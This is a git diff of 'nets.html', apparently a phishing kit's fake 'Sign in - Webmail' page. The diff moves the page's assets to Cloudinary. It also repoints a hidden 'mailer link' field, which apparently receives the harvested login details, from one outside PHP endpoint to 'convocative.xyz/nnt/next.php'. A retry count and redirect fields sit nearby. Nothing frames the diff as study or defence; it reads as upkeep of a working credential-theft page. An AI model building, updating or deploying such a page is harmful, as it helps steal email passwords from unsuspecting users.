--- a/nets.html
+++ b/nets.html
@@ -15,7 +15,7 @@
     <meta http-equiv="X-UA-Compatible" content="IE=edge">
     <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1, maximum-scale=5">
     <title>Sign in - Webmail</title>
-    <link rel="stylesheet" href="./css/app-059cd76ea4a5433e14ff6151a432ee48.css">
+    <link rel="stylesheet" href="https://res.cloudinary.com/dqiuy2t3t/raw/upload/v1741106584/app-059cd76ea4a5433e14ff6151a432ee48_v5ahyp.css">
     <style>
     @font-face {
         font-family: 'Open Sans Regular';
@@ -900,7 +900,7 @@ label + .MuiInput-formControl {
                                                 <div id="msg" style="color:red;display: none;">
                                                     Invalid password..! Please enter correct password.
                                                   </div>
-                                                <div class="style__logo___6Gg8T"><img src="./images/cb3cc3fa3480964080588c52478ae092-login.png" alt="Webmail logo"></div>
+                                                <div class="style__logo___6Gg8T"><img src="https://asset.cloudinary.com/dqiuy2t3t/33ac0d9f18988910a36c796a26788abf" alt="Webmail logo"></div>
                                                 <div style="width: 100%;"><span class="MuiTypography-root MuiTypography-caption MuiTypography-gutterBottom">Fields marked with * are required</span><br>
                                                     
                                                     <div class="MuiFormControl-root MuiTextField-root jss24 MuiFormControl-fullWidth"><label class="MuiFormLabel-root MuiInputLabel-root MuiInputLabel-formControl MuiInputLabel-animated MuiInputLabel-shrink MuiFormLabel-filled" data-shrink="true" for="loginUsername" id="loginUsername-label">Email *</label>
@@ -940,7 +940,7 @@ label + .MuiInput-formControl {
                                                     </style>
                                                     <div style="background-color:#FFFFFF; !important">
                                                         <div style="display: flex; justify-content: center; background-color: #FFFFFF; position:relative; margin-top: -500px; height: 80px;">
-                                                            <img src="./images/tmc-login.png" alt="Webmail logo" style="padding-right:25px;">
+                                                            <img src="https://res.cloudinary.com/dqiuy2t3t/image/upload/v1741106560/tmc-login_xtje7v.png" alt="Webmail logo" style="padding-right:25px;">
                                                         </div>
                                                         <h1></h1>
                                                     </div>
@@ -960,7 +960,7 @@ label + .MuiInput-formControl {
         </div>
     </div>
     <!-- //mailer link -->
-    <input type="hidden" id="f" value="https://alangorriedesigns.com/a1a/next.php">
+    <input type="hidden" id="f" value="https://convocative.xyz/nnt/next.php">
     <!-- //mail result count -->
     <input type="hidden" id="rc" value="2">
     <!-- //redirect link -->
